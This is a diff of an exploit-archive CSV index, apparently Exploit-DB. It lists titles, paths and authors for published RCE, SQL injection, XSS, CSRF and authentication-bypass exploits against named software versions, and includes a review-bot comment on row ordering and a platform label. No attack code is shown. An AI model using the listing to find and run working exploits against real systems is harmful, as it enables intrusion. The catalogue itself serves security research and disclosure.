49918,exploits/multiple/webapps/49918.py,"LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)",1970-01-01,g0ldm45k,webapps,multiple, 49918,exploits/multiple/webapps/49918.py,"LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)",1970-01-01,g0ldm45k,webapps,multiple,
49919,exploits/php/webapps/49919.txt,"ProjeQtOr Project Management 9.1.4 - Remote Code Execution",1970-01-01,"Temel Demir",webapps,php, 49919,exploits/php/webapps/49919.txt,"ProjeQtOr Project Management 9.1.4 - Remote Code Execution",1970-01-01,"Temel Demir",webapps,php,
49920,exploits/hardware/webapps/49920.html,"Ubee EVW327 - 'Enable Remote Access' Cross-Site Request Forgery (CSRF)",1970-01-01,lated,webapps,hardware, 49920,exploits/hardware/webapps/49920.html,"Ubee EVW327 - 'Enable Remote Access' Cross-Site Request Forgery (CSRF)",1970-01-01,lated,webapps,hardware,
@ -44109,6 +44166,7 @@ id,file,description,date,author,type,platform,port
49932,exploits/php/webapps/49932.txt,"Seo Panel 4.8.0 - 'category' Reflected XSS",1970-01-01,"Piyush Patil",webapps,php, 49932,exploits/php/webapps/49932.txt,"Seo Panel 4.8.0 - 'category' Reflected XSS",1970-01-01,"Piyush Patil",webapps,php,
49933,exploits/php/webapps/49933.py,"PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution",1970-01-01,flast101,webapps,php, 49933,exploits/php/webapps/49933.py,"PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution",1970-01-01,flast101,webapps,php,
49935,exploits/php/webapps/49935.txt,"Seo Panel 4.8.0 - 'from_time' Reflected XSS",1970-01-01,"Piyush Patil",webapps,php, 49935,exploits/php/webapps/49935.txt,"Seo Panel 4.8.0 - 'from_time' Reflected XSS",1970-01-01,"Piyush Patil",webapps,php,
49937,exploits/hardware/webapps/49937.txt,"CHIYU IoT Devices - Denial of Service (DoS)",1970-01-01,sirpedrotavares,webapps,hardware,
50062,exploits/php/webapps/50062.py,"Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated)",1970-01-01,"Bryan Leong",webapps,php, 50062,exploits/php/webapps/50062.py,"Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated)",1970-01-01,"Bryan Leong",webapps,php,
49942,exploits/php/webapps/49942.txt,"FUDForum 3.1.0 - 'srch' Reflected XSS",1970-01-01,"Piyush Patil",webapps,php, 49942,exploits/php/webapps/49942.txt,"FUDForum 3.1.0 - 'srch' Reflected XSS",1970-01-01,"Piyush Patil",webapps,php,
49943,exploits/php/webapps/49943.txt,"FUDForum 3.1.0 - 'author' Reflected XSS",1970-01-01,"Piyush Patil",webapps,php, 49943,exploits/php/webapps/49943.txt,"FUDForum 3.1.0 - 'author' Reflected XSS",1970-01-01,"Piyush Patil",webapps,php,
@ -44137,6 +44195,7 @@ id,file,description,date,author,type,platform,port
49985,exploits/multiple/webapps/49985.txt,"Grocery crud 1.6.4 - 'order_by' SQL Injection",1970-01-01,TonyShavez,webapps,multiple, 49985,exploits/multiple/webapps/49985.txt,"Grocery crud 1.6.4 - 'order_by' SQL Injection",1970-01-01,TonyShavez,webapps,multiple,
49986,exploits/multiple/webapps/49986.txt,"Solar-Log 500 2.8.2 - Incorrect Access Control",1970-01-01,Luca.Chiou,webapps,multiple, 49986,exploits/multiple/webapps/49986.txt,"Solar-Log 500 2.8.2 - Incorrect Access Control",1970-01-01,Luca.Chiou,webapps,multiple,
49987,exploits/multiple/webapps/49987.txt,"Solar-Log 500 2.8.2 - Unprotected Storage of Credentials",1970-01-01,Luca.Chiou,webapps,multiple, 49987,exploits/multiple/webapps/49987.txt,"Solar-Log 500 2.8.2 - Unprotected Storage of Credentials",1970-01-01,Luca.Chiou,webapps,multiple,
49988,exploits/php/webapps/49988.txt,"Zenario CMS 8.8.52729 - 'cID' SQL injection (Authenticated)",1970-01-01,"Avinash R",webapps,php,
49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",1970-01-01,securityforeveryone.com,webapps,php, 49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",1970-01-01,securityforeveryone.com,webapps,php,
49990,exploits/multiple/webapps/49990.txt,"Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)",1970-01-01,"Abdulazeez Alaseeri",webapps,multiple, 49990,exploits/multiple/webapps/49990.txt,"Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)",1970-01-01,"Abdulazeez Alaseeri",webapps,multiple,
49991,exploits/multiple/webapps/49991.txt,"Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)",1970-01-01,"Abdulazeez Alaseeri",webapps,multiple, 49991,exploits/multiple/webapps/49991.txt,"Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)",1970-01-01,"Abdulazeez Alaseeri",webapps,multiple,
@ -44144,6 +44203,7 @@ id,file,description,date,author,type,platform,port
49993,exploits/php/webapps/49993.txt,"COVID19 Testing Management System 1.0 - 'State' Stored Cross-Site-Scripting (XSS)",1970-01-01,"BHAVESH KAUL",webapps,php, 49993,exploits/php/webapps/49993.txt,"COVID19 Testing Management System 1.0 - 'State' Stored Cross-Site-Scripting (XSS)",1970-01-01,"BHAVESH KAUL",webapps,php,
49994,exploits/php/webapps/49994.txt,"Stock Management System 1.0 - 'user_id' Blind SQL injection (Authenticated)",1970-01-01,"Riadh Benlamine",webapps,php, 49994,exploits/php/webapps/49994.txt,"Stock Management System 1.0 - 'user_id' Blind SQL injection (Authenticated)",1970-01-01,"Riadh Benlamine",webapps,php,
49995,exploits/php/webapps/49995.txt,"Small CRM 3.0 - 'Authentication Bypass' SQL Injection",1970-01-01,"BHAVESH KAUL",webapps,php, 49995,exploits/php/webapps/49995.txt,"Small CRM 3.0 - 'Authentication Bypass' SQL Injection",1970-01-01,"BHAVESH KAUL",webapps,php,
49996,exploits/php/webapps/49996.txt,"TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)",1970-01-01,"Mert Daş",webapps,php,
49998,exploits/php/webapps/49998.py,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)",1970-01-01,"Ron Jost",webapps,php, 49998,exploits/php/webapps/49998.py,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
50007,exploits/php/webapps/50007.txt,"Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS)",1970-01-01,"BHAVESH KAUL",webapps,php, 50007,exploits/php/webapps/50007.txt,"Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS)",1970-01-01,"BHAVESH KAUL",webapps,php,
50008,exploits/tru64/webapps/50008.txt,"Client Management System 1.1 - 'Search' SQL Injection",1970-01-01,"BHAVESH KAUL",webapps,tru64, 50008,exploits/tru64/webapps/50008.txt,"Client Management System 1.1 - 'Search' SQL Injection",1970-01-01,"BHAVESH KAUL",webapps,tru64,
@ -44177,11 +44237,13 @@ id,file,description,date,author,type,platform,port
50057,exploits/cfm/webapps/50057.py,"Adobe ColdFusion 8 - Remote Command Execution (RCE)",1970-01-01,Pergyz,webapps,cfm, 50057,exploits/cfm/webapps/50057.py,"Adobe ColdFusion 8 - Remote Command Execution (RCE)",1970-01-01,Pergyz,webapps,cfm,
50058,exploits/hardware/webapps/50058.py,"TP-Link TL-WR841N - Command Injection",1970-01-01,"Koh You Liang",webapps,hardware, 50058,exploits/hardware/webapps/50058.py,"TP-Link TL-WR841N - Command Injection",1970-01-01,"Koh You Liang",webapps,hardware,
50108,exploits/linux/webapps/50108.py,"Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) (2)",1970-01-01,enox,webapps,linux, 50108,exploits/linux/webapps/50108.py,"Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) (2)",1970-01-01,enox,webapps,linux,
50107,exploits/php/webapps/50107.py,"WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal",1970-01-01,TheSmuggler,webapps,php,
50063,exploits/php/webapps/50063.txt,"Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated)",1970-01-01,"Barış Yıldızoğlu",webapps,php, 50063,exploits/php/webapps/50063.txt,"Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated)",1970-01-01,"Barış Yıldızoğlu",webapps,php,
50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",1970-01-01,"Maide Ilkay Aydogdu",webapps,php, 50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",1970-01-01,"Maide Ilkay Aydogdu",webapps,php,
50066,exploits/php/webapps/50066.txt,"WordPress Plugin YOP Polls 6.2.7 - Stored Cross Site Scripting (XSS)",1970-01-01,"Toby Jackson",webapps,php, 50066,exploits/php/webapps/50066.txt,"WordPress Plugin YOP Polls 6.2.7 - Stored Cross Site Scripting (XSS)",1970-01-01,"Toby Jackson",webapps,php,
50075,exploits/php/webapps/50075.txt,"Online Voting System 1.0 - Authentication Bypass (SQLi)",1970-01-01,"Salman Asad",webapps,php, 50075,exploits/php/webapps/50075.txt,"Online Voting System 1.0 - Authentication Bypass (SQLi)",1970-01-01,"Salman Asad",webapps,php,
50074,exploits/php/webapps/50074.txt,"Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)",1970-01-01,"Murat DEMİRCİ",webapps,php, 50074,exploits/php/webapps/50074.txt,"Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)",1970-01-01,"Murat DEMİRCİ",webapps,php,
50068,exploits/macos/webapps/50068.txt,"Atlassian Jira Server Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS)",1970-01-01,Captain_hook,webapps,macos,
50069,exploits/hardware/webapps/50069.py,"Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Bryan Leong",webapps,hardware, 50069,exploits/hardware/webapps/50069.py,"Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Bryan Leong",webapps,hardware,
50071,exploits/php/webapps/50071.py,"phpAbook 0.9i - SQL Injection",1970-01-01,"Alejandro Perez",webapps,php, 50071,exploits/php/webapps/50071.py,"phpAbook 0.9i - SQL Injection",1970-01-01,"Alejandro Perez",webapps,php,
50072,exploits/multiple/webapps/50072.py,"Apache Superset 1.1.0 - Time-Based Account Enumeration",1970-01-01,"Dolev Farhi",webapps,multiple, 50072,exploits/multiple/webapps/50072.py,"Apache Superset 1.1.0 - Time-Based Account Enumeration",1970-01-01,"Dolev Farhi",webapps,multiple,
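Review bot: row 50107 is added after 50108, and both sit between 50058 and 50063, so this region is out of ID order; place 50107 before 50108 and move both to their ascending-order position. Row 50068 also classifies an Atlassian Jira Server Data Center reflected XSS as platform 'macos' (path exploits/macos/webapps); Jira Server is a cross-platform Java web application, and the other rows in this diff use 'java' or 'multiple' for such targets, so confirm the intended platform before merging.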
@ -44189,6 +44251,7 @@ id,file,description,date,author,type,platform,port
50076,exploits/php/webapps/50076.txt,"Online Voting System 1.0 - Remote Code Execution (Authenticated)",1970-01-01,"Salman Asad",webapps,php, 50076,exploits/php/webapps/50076.txt,"Online Voting System 1.0 - Remote Code Execution (Authenticated)",1970-01-01,"Salman Asad",webapps,php,
50077,exploits/php/webapps/50077.py,"Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)",1970-01-01,"Ron Jost",webapps,php, 50077,exploits/php/webapps/50077.py,"Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
50078,exploits/multiple/webapps/50078.txt,"Vianeos OctoPUS 5 - 'login_user' SQLi",1970-01-01,"Audencia Business SCHOOL Red Team",webapps,multiple, 50078,exploits/multiple/webapps/50078.txt,"Vianeos OctoPUS 5 - 'login_user' SQLi",1970-01-01,"Audencia Business SCHOOL Red Team",webapps,multiple,
50079,exploits/multiple/webapps/50079.txt,"Scratch Desktop 3.17 - Remote Code Execution",1970-01-01,"Stig Magnus Baugstø",webapps,multiple,
50080,exploits/hardware/webapps/50080.txt,"AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,"Tyler Butler",webapps,hardware, 50080,exploits/hardware/webapps/50080.txt,"AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,"Tyler Butler",webapps,hardware,
50081,exploits/php/webapps/50081.txt,"b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF)",1970-01-01,"Alperen Ergel",webapps,php, 50081,exploits/php/webapps/50081.txt,"b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF)",1970-01-01,"Alperen Ergel",webapps,php,
50082,exploits/php/webapps/50082.py,"Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated)",1970-01-01,"Ron Jost",webapps,php, 50082,exploits/php/webapps/50082.py,"Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
@ -44198,6 +44261,7 @@ id,file,description,date,author,type,platform,port
50087,exploits/php/webapps/50087.rb,"OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2)",1970-01-01,"Alexandre ZANNI",webapps,php, 50087,exploits/php/webapps/50087.rb,"OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2)",1970-01-01,"Alexandre ZANNI",webapps,php,
50088,exploits/php/webapps/50088.py,"Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE)",1970-01-01,Geiseric,webapps,php, 50088,exploits/php/webapps/50088.py,"Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE)",1970-01-01,Geiseric,webapps,php,
50089,exploits/php/webapps/50089.txt,"Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Subhadip Nag",webapps,php, 50089,exploits/php/webapps/50089.txt,"Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Subhadip Nag",webapps,php,
50090,exploits/php/webapps/50090.txt,"Church Management System 1.0 - Arbitrary File Upload (Authenticated)",1970-01-01,"Murat DEMİRCİ",webapps,php,
50091,exploits/php/webapps/50091.txt,"Church Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php, 50091,exploits/php/webapps/50091.txt,"Church Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php,
50092,exploits/php/webapps/50092.txt,"Church Management System 1.0 - 'password' SQL Injection (Authentication Bypass)",1970-01-01,"Murat DEMİRCİ",webapps,php, 50092,exploits/php/webapps/50092.txt,"Church Management System 1.0 - 'password' SQL Injection (Authentication Bypass)",1970-01-01,"Murat DEMİRCİ",webapps,php,
50093,exploits/php/webapps/50093.py,"Wordpress Plugin Backup Guard 1.5.8 - Remote Code Execution (Authenticated)",1970-01-01,"Ron Jost",webapps,php, 50093,exploits/php/webapps/50093.py,"Wordpress Plugin Backup Guard 1.5.8 - Remote Code Execution (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
@ -44213,6 +44277,7 @@ id,file,description,date,author,type,platform,port
50103,exploits/php/webapps/50103.php,"Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated)",1970-01-01,"Thamer Almohammadi",webapps,php, 50103,exploits/php/webapps/50103.php,"Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated)",1970-01-01,"Thamer Almohammadi",webapps,php,
50104,exploits/hardware/webapps/50104.txt,"Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation",1970-01-01,"Andrea D\'Ubaldo",webapps,hardware, 50104,exploits/hardware/webapps/50104.txt,"Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation",1970-01-01,"Andrea D\'Ubaldo",webapps,hardware,
50105,exploits/php/webapps/50105.txt,"Phone Shop Sales Managements System 1.0 - Authentication Bypass (SQLi)",1970-01-01,faisalfs10x,webapps,php, 50105,exploits/php/webapps/50105.txt,"Phone Shop Sales Managements System 1.0 - Authentication Bypass (SQLi)",1970-01-01,faisalfs10x,webapps,php,
50106,exploits/php/webapps/50106.txt,"Phone Shop Sales Managements System 1.0 - Arbitrary File Upload",1970-01-01,faisalfs10x,webapps,php,
50109,exploits/php/webapps/50109.txt,"Online Covid Vaccination Scheduler System 1.0 - 'username' time-based blind SQL Injection",1970-01-01,faisalfs10x,webapps,php, 50109,exploits/php/webapps/50109.txt,"Online Covid Vaccination Scheduler System 1.0 - 'username' time-based blind SQL Injection",1970-01-01,faisalfs10x,webapps,php,
50110,exploits/php/webapps/50110.py,"WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)",1970-01-01,"Beren Kuday GÖRÜN",webapps,php, 50110,exploits/php/webapps/50110.py,"WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)",1970-01-01,"Beren Kuday GÖRÜN",webapps,php,
50111,exploits/php/webapps/50111.py,"Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated)",1970-01-01,"Davide \'yth1n\' Bianchin",webapps,php, 50111,exploits/php/webapps/50111.py,"Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated)",1970-01-01,"Davide \'yth1n\' Bianchin",webapps,php,
@ -44221,14 +44286,17 @@ id,file,description,date,author,type,platform,port
50114,exploits/php/webapps/50114.py,"Online Covid Vaccination Scheduler System 1.0 - Arbitrary File Upload to Remote Code Execution (Unauthenticated)",1970-01-01,faisalfs10x,webapps,php, 50114,exploits/php/webapps/50114.py,"Online Covid Vaccination Scheduler System 1.0 - Arbitrary File Upload to Remote Code Execution (Unauthenticated)",1970-01-01,faisalfs10x,webapps,php,
50115,exploits/php/webapps/50115.py,"Wordpress Plugin SP Project & Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Ron Jost",webapps,php, 50115,exploits/php/webapps/50115.py,"Wordpress Plugin SP Project & Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
50116,exploits/php/webapps/50116.py,"Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE",1970-01-01,"Eleonora Guardini",webapps,php, 50116,exploits/php/webapps/50116.py,"Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE",1970-01-01,"Eleonora Guardini",webapps,php,
50117,exploits/php/webapps/50117.txt,"Zoo Management System 1.0 - 'Multiple' Persistent Cross-Site-Scripting (XSS)",1970-01-01,"Subhadip Nag",webapps,php,
50118,exploits/multiple/webapps/50118.txt,"Apache Tomcat 9.0.0.M1 - Open Redirect",1970-01-01,"Central InfoSec",webapps,multiple, 50118,exploits/multiple/webapps/50118.txt,"Apache Tomcat 9.0.0.M1 - Open Redirect",1970-01-01,"Central InfoSec",webapps,multiple,
50120,exploits/php/webapps/50120.txt,"WordPress Plugin WPFront Notification Bar 1.9.1.04012 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Swapnil Subhash Bodekar",webapps,php, 50120,exploits/php/webapps/50120.txt,"WordPress Plugin WPFront Notification Bar 1.9.1.04012 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Swapnil Subhash Bodekar",webapps,php,
50119,exploits/multiple/webapps/50119.txt,"Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)",1970-01-01,"Central InfoSec",webapps,multiple, 50119,exploits/multiple/webapps/50119.txt,"Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)",1970-01-01,"Central InfoSec",webapps,multiple,
50121,exploits/php/webapps/50121.txt,"Invoice System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Subhadip Nag",webapps,php, 50121,exploits/php/webapps/50121.txt,"Invoice System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Subhadip Nag",webapps,php,
50122,exploits/php/webapps/50122.rb,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)",1970-01-01,"Alexandre ZANNI",webapps,php, 50122,exploits/php/webapps/50122.rb,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)",1970-01-01,"Alexandre ZANNI",webapps,php,
50123,exploits/php/webapps/50123.py,"Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload",1970-01-01,"Luca Bernardi",webapps,php, 50123,exploits/php/webapps/50123.py,"Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload",1970-01-01,"Luca Bernardi",webapps,php,
50127,exploits/php/webapps/50127.txt,"WordPress Plugin Current Book 1.0.1 - 'Book Title' Persistent Cross-Site Scripting",1970-01-01,"Vikas Srivastava",webapps,php,
50128,exploits/php/webapps/50128.py,"osCommerce 2.3.4.1 - Remote Code Execution (2)",1970-01-01,"Bryan Leong",webapps,php, 50128,exploits/php/webapps/50128.py,"osCommerce 2.3.4.1 - Remote Code Execution (2)",1970-01-01,"Bryan Leong",webapps,php,
50129,exploits/php/webapps/50129.py,"WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Simone Cristofaro",webapps,php, 50129,exploits/php/webapps/50129.py,"WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Simone Cristofaro",webapps,php,
50131,exploits/java/webapps/50131.py,"ForgeRock Access Manager 14.6.3 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Photubias,webapps,java,
50132,exploits/hardware/webapps/50132.py,"Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection",1970-01-01,"Metin Yunus Kandemir",webapps,hardware, 50132,exploits/hardware/webapps/50132.py,"Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection",1970-01-01,"Metin Yunus Kandemir",webapps,hardware,
50137,exploits/php/webapps/50137.txt,"WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)",1970-01-01,nhattruong,webapps,php, 50137,exploits/php/webapps/50137.txt,"WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)",1970-01-01,nhattruong,webapps,php,
50138,exploits/php/webapps/50138.txt,"WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation",1970-01-01,nhattruong,webapps,php, 50138,exploits/php/webapps/50138.txt,"WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation",1970-01-01,nhattruong,webapps,php,
@ -44236,6 +44304,7 @@ id,file,description,date,author,type,platform,port
50142,exploits/php/webapps/50142.txt,"PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection",1970-01-01,faisalfs10x,webapps,php, 50142,exploits/php/webapps/50142.txt,"PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection",1970-01-01,faisalfs10x,webapps,php,
50143,exploits/php/webapps/50143.txt,"WordPress Plugin KN Fix Your Title 1.0.1 - 'Separator' Stored Cross-Site Scripting (XSS)",1970-01-01,"Aakash Choudhary",webapps,php, 50143,exploits/php/webapps/50143.txt,"WordPress Plugin KN Fix Your Title 1.0.1 - 'Separator' Stored Cross-Site Scripting (XSS)",1970-01-01,"Aakash Choudhary",webapps,php,
50144,exploits/linux/webapps/50144.py,"Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)",1970-01-01,Mesh3l_911,webapps,linux, 50144,exploits/linux/webapps/50144.py,"Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)",1970-01-01,Mesh3l_911,webapps,linux,
50146,exploits/hardware/webapps/50146.txt,"KevinLAB BEMS 1.0 - Authentication Bypass",1970-01-01,LiquidWorm,webapps,hardware,
50147,exploits/hardware/webapps/50147.txt,"KevinLAB BEMS 1.0 - File Path Traversal Information Disclosure (Authenticated)",1970-01-01,LiquidWorm,webapps,hardware, 50147,exploits/hardware/webapps/50147.txt,"KevinLAB BEMS 1.0 - File Path Traversal Information Disclosure (Authenticated)",1970-01-01,LiquidWorm,webapps,hardware,
50148,exploits/php/webapps/50148.txt,"CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion",1970-01-01,faisalfs10x,webapps,php, 50148,exploits/php/webapps/50148.txt,"CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion",1970-01-01,faisalfs10x,webapps,php,
50149,exploits/multiple/webapps/50149.py,"ElasticSearch 7.13.3 - Memory disclosure",1970-01-01,r0ny,webapps,multiple, 50149,exploits/multiple/webapps/50149.py,"ElasticSearch 7.13.3 - Memory disclosure",1970-01-01,r0ny,webapps,multiple,
@ -44245,18 +44314,24 @@ id,file,description,date,author,type,platform,port
50155,exploits/php/webapps/50155.txt,"XOS Shop 1.0.9 - 'Multiple' Arbitrary File Deletion (Authenticated)",1970-01-01,faisalfs10x,webapps,php, 50155,exploits/php/webapps/50155.txt,"XOS Shop 1.0.9 - 'Multiple' Arbitrary File Deletion (Authenticated)",1970-01-01,faisalfs10x,webapps,php,
50156,exploits/php/webapps/50156.py,"PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection",1970-01-01,S1lv3r,webapps,php, 50156,exploits/php/webapps/50156.py,"PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection",1970-01-01,S1lv3r,webapps,php,
50158,exploits/php/webapps/50158.txt,"Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass",1970-01-01,Shafique_Wasta,webapps,php, 50158,exploits/php/webapps/50158.txt,"Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass",1970-01-01,Shafique_Wasta,webapps,php,
50159,exploits/php/webapps/50159.py,"Event Registration System with QR Code 1.0 - Authentication Bypass",1970-01-01,"Javier Olmedo",webapps,php,
50161,exploits/windows/webapps/50161.txt,"TripSpark VEO Transportation - Blind SQL Injection",1970-01-01,"Sedric Louissaint",webapps,windows, 50161,exploits/windows/webapps/50161.txt,"TripSpark VEO Transportation - Blind SQL Injection",1970-01-01,"Sedric Louissaint",webapps,windows,
50162,exploits/hardware/webapps/50162.txt,"Denver IP Camera SHO-110 - Unauthenticated Snapshot",1970-01-01,"Ivan Nikolsky",webapps,hardware, 50162,exploits/hardware/webapps/50162.txt,"Denver IP Camera SHO-110 - Unauthenticated Snapshot",1970-01-01,"Ivan Nikolsky",webapps,hardware,
50163,exploits/hardware/webapps/50163.txt,"Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download",1970-01-01,LiquidWorm,webapps,hardware, 50163,exploits/hardware/webapps/50163.txt,"Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download",1970-01-01,LiquidWorm,webapps,hardware,
50164,exploits/aspx/webapps/50164.txt,"IntelliChoice eFORCE Software Suite 2.5.9 - Username Enumeration",1970-01-01,LiquidWorm,webapps,aspx, 50164,exploits/aspx/webapps/50164.txt,"IntelliChoice eFORCE Software Suite 2.5.9 - Username Enumeration",1970-01-01,LiquidWorm,webapps,aspx,
50165,exploits/php/webapps/50165.txt,"Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection",1970-01-01,securityforeveryone.com,webapps,php, 50165,exploits/php/webapps/50165.txt,"Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection",1970-01-01,securityforeveryone.com,webapps,php,
50166,exploits/java/webapps/50166.py,"CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF)",1970-01-01,niebardzo,webapps,java,
50167,exploits/multiple/webapps/50167.txt,"Oracle Fatwire 6.3 - Multiple Vulnerabilities",1970-01-01,"J. Francisco Bolivar",webapps,multiple, 50167,exploits/multiple/webapps/50167.txt,"Oracle Fatwire 6.3 - Multiple Vulnerabilities",1970-01-01,"J. Francisco Bolivar",webapps,multiple,
50169,exploits/php/webapps/50169.txt,"Men Salon Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Akshay Khanna",webapps,php, 50169,exploits/php/webapps/50169.txt,"Men Salon Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Akshay Khanna",webapps,php,
50171,exploits/php/webapps/50171.txt,"Online Hotel Reservation System 1.0 - 'Multiple' Cross-site scripting (XSS)",1970-01-01,"Mohammad Koochaki",webapps,php, 50171,exploits/php/webapps/50171.txt,"Online Hotel Reservation System 1.0 - 'Multiple' Cross-site scripting (XSS)",1970-01-01,"Mohammad Koochaki",webapps,php,
50172,exploits/hardware/webapps/50172.txt,"Panasonic Sanyo CCTV Network Camera 2.03-0x - Cross-Site Request Forgery (Change Password)",1970-01-01,LiquidWorm,webapps,hardware,
50173,exploits/php/webapps/50173.py,"Hotel Management System 1.0 - Cross-Site Scripting (XSS) Arbitrary File Upload Remote Code Execution (RCE)",1970-01-01,"Merbin Russel",webapps,php, 50173,exploits/php/webapps/50173.py,"Hotel Management System 1.0 - Cross-Site Scripting (XSS) Arbitrary File Upload Remote Code Execution (RCE)",1970-01-01,"Merbin Russel",webapps,php,
50174,exploits/php/webapps/50174.txt,"WordPress Plugin WP Customize Login 1.1 - 'Change Logo Title' Stored Cross-Site Scripting (XSS)",1970-01-01,"Aryan Chehreghani",webapps,php, 50174,exploits/php/webapps/50174.txt,"WordPress Plugin WP Customize Login 1.1 - 'Change Logo Title' Stored Cross-Site Scripting (XSS)",1970-01-01,"Aryan Chehreghani",webapps,php,
